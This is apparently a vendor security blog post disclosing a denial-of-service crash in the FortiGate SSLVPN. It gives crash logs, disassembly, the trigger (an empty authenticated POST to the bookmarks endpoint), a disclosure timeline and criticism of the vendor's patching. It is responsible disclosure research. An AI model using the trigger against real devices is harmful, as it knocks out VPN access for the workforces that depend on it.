Fortinet and The Accidental Bug

Fortinet and The Accidental Bug

As part of our Continuous Automated Red Teaming and Attack Surface Management capabilities delivered through the watchTowr Platform, we see a lot of different bugs in a lot of different applications through a lot of different device types. We're in a good position to remark on these bugs and draw conclusions about different software vendors.

Our job is to find vulnerabilities, and we take a lot of pride in doing so - it's complex and intricate work. But, it is deeply concerning when this work is trivial in targets that are supposed to be a bastion of security. One common theme that we've seen a lot is that appliances, designed to be deployed at security boundaries, are often littered with trivial security issues.

Today we'd like to share one such example, a scarily-easy-to-exploit vulnerability in the SSLVPN component of Fortinet's Fortigate devices, which we discovered during our research into a totally unrelated bug, and still hasn't been fixed, at the time of writing, despite an extension to the usual 90-day disclosure period.

Before We Begin

So. Let's talk about bugs in general. Bugs are, let's face it, a fact of life. Every vendor has them, and sometimes, they turn into fully-fledged vulnerabilities. There is a common knee-jerk reaction to avoid software by vendors that've had recent hyped bugs, but this is usually short-sighted folly. All vendors have bugs. All vendors have vulnerabilities.

.. However..

Some bugs are more understandable than others, and indeed, some bugs make us question the security posture of the responsible parties.

I'm sure you remember a previous post in which I go into detail about CVE-2022-42475, a vulnerability in a Fortinet appliance which was a pretty serious oh-no-the-sky-is-falling bug for a lot of enterprises. But let's remember our mantra - fair enough, bugs happen, let's not pile on to Fortinet for it.

The Bug

With apologies to Webcomic Name

While researching CVE-2022-42475 as part of our rapid reaction capability for clients, we started to notice some unusual errors in our test equipment's logging. The sslvpn process was seemingly dying of a segfault. Initially, we imagined we were triggering our targetted bug for analysis via different code path.

Unfortunately, this was not the case - it turned out to be a completely new bug, found entirely by accident. This was determined by taking a look at the debug log (via diagnose debug crashlog read) which helpfully yields a stack trace:

15: 2022-12-13 05:35:29 <01230> application sslvpnd
16: 2022-12-13 05:35:29 <01230> *** signal 11 (Segmentation fault) received ***
17: 2022-12-13 05:35:29 <01230> Register dump:
18: 2022-12-13 05:35:29 <01230> RAX: 0000000000000000   RBX: 0000000000000003
19: 2022-12-13 05:35:29 <01230> RCX: 00007fff7f4761d0   RDX: 00007fa8b2961818
20: 2022-12-13 05:35:29 <01230> R08: 00007fa8b2961818   R09: 0000000002e54b8a
21: 2022-12-13 05:35:29 <01230> R10: 00007fa8b403e908   R11: 0000000000000030
22: 2022-12-13 05:35:29 <01230> R12: 00007fa8b296f858   R13: 0000000002dc090f
23: 2022-12-13 05:35:29 <01230> R14: 00007fa8b3764800   R15: 00007fa8b2961818
24: 2022-12-13 05:35:29 <01230> RSI: 00007fa8b2961440   RDI: 00007fa8b296f858
25: 2022-12-13 05:35:29 <01230> RBP: 00007fff7f4762a0   RSP: 00007fff7f4761a0
26: 2022-12-13 05:35:29 <01230> RIP: 00000000015e2f84   EFLAGS: 0000000000010286
27: 2022-12-13 05:35:29 <01230> CS:  0033   FS: 0000   GS: 0000
28: 2022-12-13 05:35:29 <01230> Trap: 000000000000000e   Error: 0000000000000004
29: 2022-12-13 05:35:29 <01230> OldMask: 0000000000000000
30: 2022-12-13 05:35:29 <01230> CR2: 0000000000000040
31: 2022-12-13 05:35:29 <01230> stack: 0x7fff7f4761a0 - 0x7fff7f4793b0 
32: 2022-12-13 05:35:29 <01230> Backtrace:
33: 2022-12-13 05:35:29 <01230> [0x015e2f84] => /bin/sslvpnd  
34: 2022-12-13 05:35:29 <01230> [0x015e3335] => /bin/sslvpnd  
35: 2022-12-13 05:35:29 <01230> [0x01586f08] => /bin/sslvpnd  
36: 2022-12-13 05:35:29 <01230> [0x01592c82] => /bin/sslvpnd  
37: 2022-12-13 05:35:29 <01230> [0x016a4c9d] => /bin/sslvpnd  

A segfault such as this would often indicate a bug exploitable for remote code execution, and so our interest was piqued. Let's take a look at the faulting code:

mov     rax, [rbp+var_F8]
mov     rdx, r15
mov     rdi, r12
mov     r9, [rbp+var_F0]
mov     rsi, [rbp+var_D8]
lea     rcx, [rbp+var_D0]
movzx   r8d, byte ptr [rax+40h] <-- crash here
call    sub_15E1F80

As you can see, we're trying to dereference the NULL pointer, and pass it to another function. In a higher-level language, such as C, the code might look like this (I've added guessed variable names to try to make things more informative):

sub_15E1F80(conn, reqInfo, helper, &var_D0, *var_F8->memberAt0x40, unknown);

The NULL dereference is occurring because the var_F8 variable contains zero (you can see from the register dump above, the RAX register is, indeed, zero). But why? What should this member do, and why isn't it doing it?

Well, it's quite difficult to know for sure, given only a stripped binary. But we can make some guesses. Since var_F8 is assigned to the result of the function sub_16B8300, let's take a look at what the other callers of this function do with the result. Here's one:

    v4 = sub_16B8300(a2);
    if ( v4->memberAt0x40 )
      v7 = AF_INET6;
      v7 = AF_INET;
    v9 = socket(v7, 1, 6);

It looks like the result is tested to see if it is an ipv4 socket or an ipv6 socket, and a socket is instantiated appropriately by the code. It seems likely that this function returns some kind of socket, perhaps attached to the IO of the request. Another function is more cryptic, but demonstrates the bit-twiddling that is a signature of socket and file descriptor code:

v5 = sub_16B8300(v3);
v14 = ((*(*(v5 + 80) + 112LL) >> 3) ^ 1) & 1;
*v5->memberAt0x40 = v14;

Going back to our crash itself, it's interesting to note that the crash occurs when we send a HTTP POST request to /remote/portal/bookmarks containing no data payload. This would seem to align with our 'IO of the request' theory - if the POST request has a Content-Length of zero, the socket may be closed before the handler gets a chance to run.

It is somewhat alarming that the crash is so easy to trigger, although we are somewhat relieved to report that authentication as a VPN user is required before this endpoint is accessible. Additionally, the results of a more involved analysis, carried out by watchTowr engineers, indicates that exploitation is limited to this denial-of-service condition and does not permit code execution.

However, one could easily imagine a disgruntled employee running a script to repeatedly crash the SSLVPN process, - or worse yet - an attacker trying to prevent access to an environment, to hinder response to another cyber security incident - both scenarios rendering the VPN unusable for the entire workforce. While it's not as bad as the world-ending remote-code-execution bugs we've seen lately (and indeed, were released as this post was in the final stages being drafted) it's still a worrisome bug.

When I say this bug is 'worrisome', I mean this on more than one level. On the surface, of course, it allows adversaries to crash a system service. But it is also worrisome in its pure simplicity.

A Trend

It would be nice if we could say that discovering this bug was a one-in-a-million chance, or that it required the skill of a thousand 'Thought Leaders' - but this just isn't the case based on our experience thus far.

The fact that we discovered this bug while hunting for details of a separate bug does not inspire confidence in the target, and the simplicity of the bug trigger is alarming. While we usually shy away from remarking on a vendor's internal development processes due to the inherent lack of visibility we have, it is very difficult to resist in this case. This does seem very much like the kind of 'textbook' condition that could be discovered very easily by anyone with a basic HTTP fuzzer, which raises serious questions for ourselves about how much assurance Fortinet is really in a position to provide to its userbase. Bugs are an inevitable fact of life, but at least some bugs should not make it to production.

It is, of course, risky for an outside organisation such as ours to make such statements about the internal practices of a software development house. There may be some mitigating reason why this bug wasn't detected earlier, perhaps some complexity hidden within the SDLC which we are hitherto unaware of. However, even if that were the case, we find it difficult to imagine how simple end-to-end HTTP fuzzing would fail to locate a bug like this before a release to production.

One way we can get a further glimpse into Fortinet's practices is by sifting through their release notes. Taking a cursory look reveals some truly alarming bugs - my personal favourite was "WAD crash with signal 11 caused by a stack allocated buffer overflow when parsing Huffman-encoded HTTP header name if the header length is more than 256 characters". It is difficult to imagine a scenario in which that doesn't yield a serious security issue, yet Fortinet don't go into details, and we were unable to locate any security advisory related to this bug, which means that for many people it has gone unnoticed. I imagine the kind of threat actors who are specifically interested in routing platforms comb these release notes, looking for easy quick-wins, exploitable n-day bugs which administrators are not aware of.

Another way to evaluate how seriously Fortinet takes this issue is in their response to it. Fortinet were given the industry-standard 90-day grace period to patch the issue, with an additional extension granted to allow them to fit into their regular release cycle. However, not only did Fortinet neglect to release a fixed version of the 7.2 branch, but the release notes for fixed versions of the 7.0 and 7.4 branches (7.0.11 and 7.4.0) don't appear to mention the bug at all, leaving those users who haven't read this watchTowr blog in the dark as to the urgency of an upgrade.


It is very easy, as a security researcher, to blame software vendors for poor security practices or the presence of 'shallow' bugs. Security is just one component in a modern software development lifecycle, and it is a fact of life that some bugs will inevitably "slip through the 'net" (you see what I did there?) and make it into production software. This is just the nature of software development. Consequently, we try very hard to avoid doing so - software development is difficult.

However, there is a limit to how far back we will push our sense of responsibility to the wider Internet. When vendors have bugs this shallow, this frequently, this is perhaps cause for alarm - and when bugs are buried in release notes, there is serious cause for concern - all in our opinion. The only thing worse than finding out that your firewall is vulnerable to a remote RCE is not finding out.

It was not, indeed, fine

Being the responsible people we are, we also notified Fortinet of this discovery in accordance with our VDP.

Fortinet were prompt in their confirmation of the bug, and released fixes for two of the three branches of Fortiguard that they maintain - the bug is fixed in versions 7.0.11 and 7.4.0. The Fortiguard team then requested that we extend our usual 90-day release window until 'the end of May' to allow them to release a fix for the 7.5 branch, 7.2.5, a proposal which watchTowr accepted. However, this release has not materialised, and as such there is currently no released fix for the 7.2 branch. Those who operate such devices are advised to restrict SSL VPN use to trusted users if at all possible - hardly an acceptable workaround in our opinion.

Here at watchTowr, we believe continuous security testing is the future, enabling the rapid identification of holistic high-impact vulnerabilities that affect your organisation.

If you'd like to learn more about the watchTowr Platform, our Continuous Automated Red Teaming and Attack Surface Management solution, please get in touch.


Date Detail
13th February 2023 Initial disclosure to vendor, vendor acknowledges receipt
2nd March 2023 Follow-up email to vendor
2nd March 2023 Vendor replies that they are working on the issue, and cannot provide a specific date but will keep watchTowr informed as the fix progresses
3rd April 2023 Inform vendor that watchTowr has adopted an industry-standard 90-day disclosure window, request that they release a fix before this window expires
5th April 2023 Vendor replies that a fix has already been developed and released for version 7.0.11 of FortiGuard. Vendor also reveals that a fix has been developed for versions 7.2.5 and 7.4.0, due to be released 'end of May' and 'end of April' respectively. Vendor requests that we delay disclosure until 'end of May' to align with their release schedule; watchTowr agrees
31st May 2023 Disclosure deadline; watchTowr requests that vendor shares CVE and/or 'Bug ID' identifiers to aid clients in tracking the issue
31st May 2023 Vendor requests additional time to develop fix, watchTowr does not agree

DISCLAIMER: This blogpost contains the personal opinions and perspectives of the author. The views expressed in this blogpost are solely those of the author and do not necessarily reflect the opinions or positions of any other individuals, organizations, or entities mentioned or referenced herein.

The information provided in this blogpost is for general informational purposes only. It is not intended to provide professional advice, or conclusions of internal software development processes or security posture. All opinions have been inferred from the experiences of the author.